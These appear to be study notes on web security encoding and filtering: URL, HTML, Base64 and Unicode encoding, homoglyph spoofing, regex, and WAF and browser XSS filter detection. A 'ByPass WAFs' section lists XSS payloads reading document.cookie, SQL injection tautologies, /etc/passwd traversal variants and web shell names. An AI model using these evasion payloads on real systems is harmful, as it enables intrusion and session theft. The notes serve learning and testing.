Data Encoding Basics
URL encoding
This table is a character encoding chart that is useful in explaining which characters are “safe” and which characters should be encoded in URLs.
- http://perishablepress.com/stop-using-unsafe-characters-in-urls/
Some commonly encoded characters are:
Character | Purporse in URL | Encoding |
’#’ | Separate anchors | %23 |
’?’ | Separate query string | %3F |
‘&’ | Separate query elements | %24 |
’%’ | Indicates an encoded character | %25 |
’/’ | Separate domain and directories | %2F |
’+’ | Indicates a space | %2B |
‘ |
Not recommended | %20 or + |
HTML encoding
Documents transmitted via HTTP can send a charset parameter in the header to specify the character encoding of the document sent. This is the HTTP header: Content-Type
Content-Type:text/html;charset=utf-8
Define character encoding using HTTP
# PHP > Uses the header() function to send a raw HTTP header:
header('Content-Type:text/html;charset=utf-8')
# ASP.Net > Uses the response object:
<%Response.charset="utf-8"%>
# JSP > Uses the page directive:
<%@ page contentType="text/html; charset=UTF-8"%>
# Using directive META:
<meta http-equiv="Content-Type" Content="text/html;charset=utf-8">
# With HTML5, is also possible to write:
<meta charset="utf-8">
HTML4 and HTML5 specifications about special characters
http://www.w3.org/TR/1998/REC-html40-19980424/charset.html#h-5.3
http://www.w3.org/TR/html5/single-page.html#character-references
- Named characters references:
→ http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references#Character_entity_references_in_HTML
Characters references must start with a U+0026 AMPERSAND character (&):
CHaracter Reference | Rule | Encoded character |
Named entity | & + named character references + ; | &It; |
Numeric Decimal | & + # + |
< |
Numeric Hexadecimal | & + #x + |
< / < |
Some Variations:
CHaracter Reference | Variation | Encoded character |
Numeric Decimal | No terminator (;) | < |
One or more zeroes before code | < / < | |
Numeric Hexadecimal | No terminator (;) | < |
One or more zeroes before code | �x3c / c |
Base (36|64) encoding
Base 36 Encoding Scheme
Base36 - Its the most compact, case-insensitive, alphanumerical system using ASCII characters. In fact, the schemes alphabet contains all digits [0-9] and Latin letters [A-Z]
Its used in many real-world scenarios
- Reddit used if For identifying both posts and comments
Some URL shortening services like TinyURL use Base36 integer as compact, alphanumeric identifiers.
→ http://tinyurl/ljasd
PHP
PHP uses the base_convert() function to convert numbers:
OHPE is Base 10 is <?=base_convert("OHPE",36,10);?>
JavaScript JavaScript used two functions:
(1142690.toString(36)
1142690..toString(36) #encode
parseInt("ohpe",36) #decode
Base64 Encoding Scheme
Base64 is one of the most widespread binary-to-text encoding schemes to date. It was designed to allow binary data to be represented as ASCII string text.
- The alphabet of the Base64 encoding scheme is composed of digits [0-9] and Latin letters, both upper and lower case [a-zA-Z], For a total of 62 values. To complete the character set to 64 there are the plus (+) and slash (/) characters.
- Moreover: http://en.wikipedia.org/wiki/Base64#Implementations_and_history
The algorithm divides the message into groups of 6 bits* and then converts each group, with the respective ASCII character, following the conversion table.
Thats why the allowed characters are 64 (2 raised to 6th power = 64)
- If the lastest gruop is null(000000) the respective encoding value is =
- If the traiing null groups are two, then will be encoded as ==
PHP PHP used base64_encode and base64_decode functions based on MIME Base64 implementation:
<?=base64_encode('encode this string')?> //encode
<?=base64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n')?> //decode
JavaScript Many browsers can handle base64 natively through function btoa and atob:
window.btoa('encode this string'); //encode
window.atob('ZW5jb2RlIHRoaXMgc3RyaW5n'); //decode
Moreover: https://developer.mozilla.org/en-US/docs/Web/API/Window.btoa
Unicode encoding
Unicode aka ISO/IEC 10646 Universal Character Set. It can expose web applications to possible security attacks, like bypass filters.
- http://www.joelonsoftware.com/articles/Unicode.html
UTF = Unicode Transformation Format:
- UTF-8
- UTF-16
- UTF-32
Homoglyph | Visual Spoofing
In typography, a Homoglyph is one or two or more characters, or glyphs, with shapes that either appear identical or cannot be differentiated by quick visual inspection. -Wikipedia
Homograph - a word that looks the same as another word
Homogliph - a look-like character used to create homographs
Example:
Visual Sp'oo'fing = U+006F (Latin small letter o)
U+03BF (Greek small letter omicron)
Moreover Confusables: http://unicode.org/cldr/utility/confusables.jsp
Homoglyph Attack Generator: http://www.irongeek.com/homoglyph-attack-generator.php
Article about Homoglyph and Punycode attacks: http://www.irongeek.com/i.php?page=security/out-of-character-use-of-punycode-and-homoglyph-attacks-to-obfuscate-urls-for-phishing
They can bypass anti cross-site scripting and SQL Injection filters;
- Create usernames and Spotify account hijacking: http://labs.spotify.com/2013/06/18/creative-usernames/
There are other ways in which characters and strings can be transformed by software processes, such as normalization, canonicalization, best fit mapping, etc
→ Moreover: http://websec.github.io/unicode-security-guide/
Extra Resources
- http://unicode.org/cldr/utility/
- http://codepoints.net/
- http://txtn.us/
- http://www.panix.com/~eli/unicode/convert.cgi
Multiple (De|En) Codings
- Its common to abuse multiple encodings to bypass security measures
URL-Encoding > URL
Filtering Basics
A common, yet often recommended, best practice to protect web applications against malicious attacks is the use of specific input filtering and output encoding controls.
These kings of controls may range from naive blacklists to experienced and higly restrictive whitelists. What about in the real world? We are somewhere in the middle!
- Control can be implemented at different layers in a web application. They can be represented as either libraries and APIs, or in the best case, by internal specialits or external organizations, like ESAPI by OWASP.
- https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
- Security Controls are also inside most common browsers.
Generally, these solutions fall into the IDS and IPS world, but FOr Web Applications, the most chosen are the Web Application Firewall (WAFs)
A free and open source solution: http://www.modsecurity.org/
Regular Expressions (RE or RegEx)
- Represents the official way used to define the filter rules. Mastering RegEx is fundamental to understand how to bypass filters because RE are extremely powerful.
- Its a special sequence of characters used For describing a search pattern.
→ regular expression = regex
→ pattern matched = match
Two main types
- DFA = http://en.wikipedia.org/wiki/Deterministic_finite_automaton
- NFA = http://en.wikipedia.org/wiki/Nondeterministic_finite_automaton
Engine | Program |
DFA | awk, egrep, MySQL, Procmail |
NFA | .NET languages, Java, Perl, PHP, Python, Ruby, PCRE library, vi, grep, less, more |
Comparison of regular expression engines: http://en.wikipedia.org/wiki/Comparison_of_regular_expression_engines
Regular Expression Flavor Comparison: http://www.regular-expressions.info/refflavors.html
Non-printing characters:
its used to evade bad filters and obfuscate the payload.
Match Unicode Code Point:
Regular expression flavors that work with Unicode use specific meta-sequences to match code points.
The sequence is \ucode-point, where code-point is the hexadecimal number of the character to match.
There are regex flavors like PCRE that do not support the former notation,
but use an alternative sequence \x{code-point} in its place.
example:
\u2603 = the snowman character in .NET, Java, Javascript and Python
\x{2603} = the snowman character in Apache and PHP (PCRE library)
Meta-sequence Quality:
\p{quality-id} = have a specific quality
\P{quality-id} = do not have quality
Match Unicode Category:
# To match the string with all the case variations (lower, upper and title), this regex does the job:
[\p{Ll}\p{Lu}\p{Lt}]
# As a shorthand, some regex flavors implement this solution:
\p{L&}
Web Application Firewal - WAF
ByPass WAFs
|-| = instead of using this
|→| = the best choice is
Cross-Site Scripting:
- alert('xss')
- alert(1)
→ prompt('xss')
→ prompt(8)
→ confirm('xss')
→ confirm(8)
→ alert(/xss/.source)
→ window[/alert/.source](8)
- alert(document.cookie)
→ with(document)alert(cookie)
→ alert(document['cookie'])
→ alert(document[/cookie/.source])
→ alert(document[/coo/.source+kie/.source])
- <img src=x onerror=alert(1);>
→ <svg/onload=alert(1)>
→ <video src=x onerror=alert(1);>
→ <audio src=x onerror=alert(1);>
- javascript:alert(document.cookie)
→ data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
Blind SQL Injection
- 'or 1=1 '
- 'or 6=6 '
→ 'or 0x47=0x47 '
- or char(32)=''
→ or 6 is not null
SQL Injection
- UNION SELECT
→ UNION ALL SELECT
Directory Traversal
- /etc/passwd
→ /too/../etc/far/../passwd
→ /etc//passwd
→ /etc/ignore/../passwd
→ /etc/passwd........
Web Shell
- c99.php
- r57.php
- shell.aspx
- cmd.jsp
- CmdAsp.asp
→ augh.php
Detection and Fingerprinting
Cookie Values
- Citrix Netscaler uses some different cookies in the HTTP responses like ns_af or citrix_ns_id or NSC_
- F5 BIG-IP ASM (Application Security Manager) uses cookies starting with TS and followed with a string that respect the following regex:
^TS[a-z-A-Z0-9]{3,6}
- Barracura uses two cookies barra_counter_session and BNI__BARRACUDA_LB_COOKIE
Header Rewrite
Some WAFs rewrite the HTTP headers. Usually these modify the Server Header to deceive the attackers.
HTTP Response Code
Some WAFs modify the HTTP response codes if the request is hostile; For example:
- mod_security > 406 Not Acceptable
→ AQTRONIX WebKnight > 999 No Hacking
HTTP Response Body
its also possible to detect in the response body
Example:
<body> | <body> |
…Mod_Security… | …AQTRONIX WebKnight … |
</body> | </body |
dotDefender Blocked your Request
Close Connection
its useful in dropping the connection in the case the WAF detects a malicious request
- mod_security
Detect WAF
wafw00f is a tool written in python that can detect up to 20 different WAF products
- wafw00f
- https://code.google.com/p/waffit/
The techniques used to detect a WAF are similar to those we have seen previously:
- Cookies
- Server Cloaking
- Response Codes
- Drop Action
- Pre-Built-in Rules
- Nmap contains a script that tries to detect the presence of a web application fireall, its type and version. http://nmap.org/nsedoc/scripts/http-waf-fingerprint.html
→ nmap –script=http-waf-fingerprint
- imperva-detect = https://code.google.com/p/imperva-detect/
Client-Side Filters
Browsers are the primary mean used to address client-side attacks
Browser Add-ons
NoScript Security Suite is a whitelist-based security tool that basically disables all the executable web content (Javascript, Java, Flash, Silverlight, …) and lets the user choose which sites are trusted, thus allowing the use of these technologies.
→ https://addons.mozilla.org/en-US/firefox/addon/noscript/
- http://noscript.net/features#xss is effect browser-based solutions to prevent targeted malicious web attacks.
XSS Filter (IE)
c:\windows\system32\mshtml.dll library. Ways to inspect:
# Hex editors like WinHex. Notepad++ with TextFX plugin
# IDAPro
# MS-DOS commands
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll | find "{"
> savepath //u can save to a file For more readable results
Neutering in Action
Basically, once a malicious injection is detected, the XSS Filter modified the evil part of the payload by adding the ‘#’ character in place of the neuter chracter, defined in the rules.
evil > ev{i}l > ev#l
<svg/onload=alert(1)> = <svg/#nload=alert(1)>
Web sites that chose to opt-out of this protection can use the HTTP response header:
X-XSS-Protection: 0
X-XSS-Protection: 1; mode=block //instead of sanitize the page, will render a simple #
# others browsers like safari, used the same scheme
XSS Auditor - WebKit/Blink
- http://www.adambarth.com/papers/2010/bates-barth-jackson.pdf
- enabled by default in browsers such as: chrome, opera and safari
THe filter analyzes both the inbound requests and the outbound. If, in the parsed HTML data, it finds executable code within the response, then it stops the script and generates a console alert similar to the following. The XSS Auditor refused to execute a script in …
however there is a lot of bypasses aswell